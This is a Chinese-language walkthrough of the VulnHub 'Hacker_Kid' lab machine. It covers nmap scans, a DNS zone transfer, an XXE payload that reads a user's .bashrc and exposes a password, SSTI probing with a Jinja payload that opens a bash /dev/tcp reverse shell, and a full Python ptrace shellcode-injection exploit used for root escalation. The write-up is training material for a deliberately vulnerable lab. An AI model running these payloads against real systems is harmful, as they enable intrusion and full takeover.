靶场下载地址:
https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova信息搜集
一、Nmap进行扫描
nmap -sP 192.168.106.0/24 #对自己的靶机网段进行存活探测,获取靶机地址nmap -T4 -A -p- 192.168.106.129 #对目标进行全端口扫描
@
二、WEB服务探测
通过探测发现目标开启了53、80、9999端口提示使用dig访问发现存在php环境
查看源码发现一段注释,提示使用GET参数page_no访问该页面fuzz这个参数为21时,出现了新的页面http://192.168.106.129/index.php?page_no=21
发现一个域名:hackers.blackhat.local修改hosts绑定域名访问域名后发现页面没有发现变化
尝试使用DNS域传送漏洞进行探测dig axfr @192.168.106.129 blackhat.local发现了新的域名mail.blackhat.localhackerkid.blackhat.localhacker.blackhat.local.blackhat.localwww.blackhat.local添加到hosts文件中
通过访问发现新的页面通过抓包进行注册发现数据使用的xml格式进行传输,尝试是否存在xxe漏洞
通过测试发现存在xxe漏洞发现root、saket具有登录权限使用PHP封装器读取/home/saket/.bashrc文件<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>.bashrc是home目录下的一个shell文件,用于储存用户的个性化设置。在bash每次启动时都会加载.bashrc文件中的内容,并根据内容定制当前bash的配置和环境。
# ~/.bashrc: executed by bash(1) for non-login shells.# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)# for examples# If not running interactively, don't do anythingcase $- in*i*) ;;*) return;;esac# don't put duplicate lines or lines starting with space in the history.# See bash(1) for more optionsHISTCONTROL=ignoreboth# append to the history file, don't overwrite itshopt -s histappend# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)HISTSIZE=1000HISTFILESIZE=2000# check the window size after each command and, if necessary,# update the values of LINES and COLUMNS.shopt -s checkwinsize# If set, the pattern "**" used in a pathname expansion context will# match all files and zero or more directories and subdirectories.#shopt -s globstar# make less more friendly for non-text input files, see lesspipe(1)[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"# set variable identifying the chroot you work in (used in the prompt below)if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; thendebian_chroot=$(cat /etc/debian_chroot)fi# set a fancy prompt (non-color, unless we know we "want" color)case "$TERM" inxterm-color|*-256color) color_prompt=yes;;esac# uncomment for a colored prompt, if the terminal has the capability; turned# off by default to not distract the user: the focus in a terminal window# should be on the output of commands, not on the prompt#force_color_prompt=yesif [ -n "$force_color_prompt" ]; thenif [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then# We have color support; assume it's compliant with Ecma-48# (ISO/IEC-6429). (Lack of such support is extremely rare, and such# a case would tend to support setf rather than setaf.)color_prompt=yeselsecolor_prompt=fifiif [ "$color_prompt" = yes ]; thenPS1='${debian_chroot:+($debian_chroot)}[�33[01;32m]u@h[�33[00m]:[�33[01;34m]w[�33[00m]$ 'elsePS1='${debian_chroot:+($debian_chroot)}u@h:w$ 'fiunset color_prompt force_color_prompt# If this is an xterm set the title to user@host:dircase "$TERM" inxterm*|rxvt*)PS1="[e]0;${debian_chroot:+($debian_chroot)}u@h: wa]$PS1";;*);;esac# enable color support of ls and also add handy aliasesif [ -x /usr/bin/dircolors ]; thentest -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"alias ls='ls --color=auto'#alias dir='dir --color=auto'#alias vdir='vdir --color=auto'alias grep='grep --color=auto'alias fgrep='fgrep --color=auto'alias egrep='egrep --color=auto'fi# colored GCC warnings and errors#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'# some more ls aliasesalias ll='ls -alF'alias la='ls -A'alias l='ls -CF'# Add an "alert" alias for long running commands. Use like so:# sleep 10; alertalias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '''s/^s*[0-9]+s*//;s/[;&|]s*alert$//''')"'# Alias definitions.# You may want to put all your additions into a separate file like# ~/.bash_aliases, instead of adding them here directly.# See /usr/share/doc/bash-doc/examples in the bash-doc package.if [ -f ~/.bash_aliases ]; then. ~/.bash_aliasesfi# enable programmable completion features (you don't need to enable# this, if it's already enabled in /etc/bash.bashrc and /etc/profile# sources /etc/bash.bashrc).if ! shopt -oq posix; thenif [ -f /usr/share/bash-completion/bash_completion ]; then. /usr/share/bash-completion/bash_completionelif [ -f /etc/bash_completion ]; then. /etc/bash_completionfifi#Setting Password for running python appusername="admin"password="Saket!#$%@!!"发现一个用户名和密码,通过admin用户登录http://192.168.106.129:9999失败尝试使用之前读取password发现的另一个用户saket登录成功
通过提示测试是否可以存在name参数浏览器访问http://192.168.106.129:9999/?name=1 存在name参数
通过对name参数测试,发现存在SSTI模板注入漏洞使用以下通杀payload:{{1+abcxyz}}${1+abcxyz}<%1+abcxyz%>[abcxyz]针对Python:{{1+abcxyz}}针对PHP:${1+abcxyz}针对JAVA:<%1+abcxyz%>构造反弹shell命令{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.106.128/4567 0>&1"')}}url编码后使用,本地监听4567端口,成功获取shell
三、提权
查询具有cap权限的目录和文件/sbin/getcap -r / 2>/dev/null发现python2.7设置有cap_sys_ptrace+epCap权限查询系统上以root权限运行的程序ps -ef | grep root
利用下面的代码进行提权import ctypesimport sysimport struct# Macros defined in <sys/ptrace.h># https://code.woboq.org/qt5/include/sys/ptrace.h.htmlPTRACE_POKETEXT = 4PTRACE_GETREGS = 12PTRACE_SETREGS = 13PTRACE_ATTACH = 16PTRACE_DETACH = 17# Structure defined in <sys/user.h># https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_structclass user_regs_struct(ctypes.Structure):_fields_ = [("r15", ctypes.c_ulonglong),("r14", ctypes.c_ulonglong),("r13", ctypes.c_ulonglong),("r12", ctypes.c_ulonglong),("rbp", ctypes.c_ulonglong),("rbx", ctypes.c_ulonglong),("r11", ctypes.c_ulonglong),("r10", ctypes.c_ulonglong),("r9", ctypes.c_ulonglong),("r8", ctypes.c_ulonglong),("rax", ctypes.c_ulonglong),("rcx", ctypes.c_ulonglong),("rdx", ctypes.c_ulonglong),("rsi", ctypes.c_ulonglong),("rdi", ctypes.c_ulonglong),("orig_rax", ctypes.c_ulonglong),("rip", ctypes.c_ulonglong),("cs", ctypes.c_ulonglong),("eflags", ctypes.c_ulonglong),("rsp", ctypes.c_ulonglong),("ss", ctypes.c_ulonglong),("fs_base", ctypes.c_ulonglong),("gs_base", ctypes.c_ulonglong),("ds", ctypes.c_ulonglong),("es", ctypes.c_ulonglong),("fs", ctypes.c_ulonglong),("gs", ctypes.c_ulonglong),]libc = ctypes.CDLL("libc.so.6")pid=int(sys.argv[1])# Define argument type and respone type.libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]libc.ptrace.restype = ctypes.c_uint64# Attach to the processlibc.ptrace(PTRACE_ATTACH, pid, None, None)registers=user_regs_struct()# Retrieve the value stored in registerslibc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print("Instruction Pointer: " + hex(registers.rip))print("Injecting Shellcode at: " + hex(registers.rip))# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.cshellcode = "x48x31xc0x48x31xd2x48x31xf6xffxc6x6ax29x58x6ax02x5fx0fx05x48x97x6ax02x66xc7x44x24x02x15xe0x54x5ex52x6ax31x58x6ax10x5ax0fx05x5ex6ax32x58x0fx05x6ax2bx58x0fx05x48x97x6ax03x5exffxcexb0x21x0fx05x75xf8xf7xe6x52x48xbbx2fx62x69x6ex2fx2fx73x68x53x48x8dx3cx24xb0x3bx0fx05"# Inject the shellcode into the running process byte by byte.for i in xrange(0,len(shellcode),4):# Convert the byte to little endian.shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('x00').encode('hex')shellcode_byte=int(shellcode_byte_little_endian,16)# Inject the byte.libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)print("Shellcode Injected!!")# Modify the instuction pointerregisters.rip=registers.rip+2# Set the registerslibc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print("Final Instruction Pointer: " + hex(registers.rip))# Detach from the process.libc.ptrace(PTRACE_DETACH, pid, None, None)
python2.7 exp.py 934该脚本注入成功后会启动tcp 5600端口,查看本地监听端口nc 192.168.106.129 5600成功获取root权限
原文始发于微信公众号(渗透笔记):Hacker_Kid靶场实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论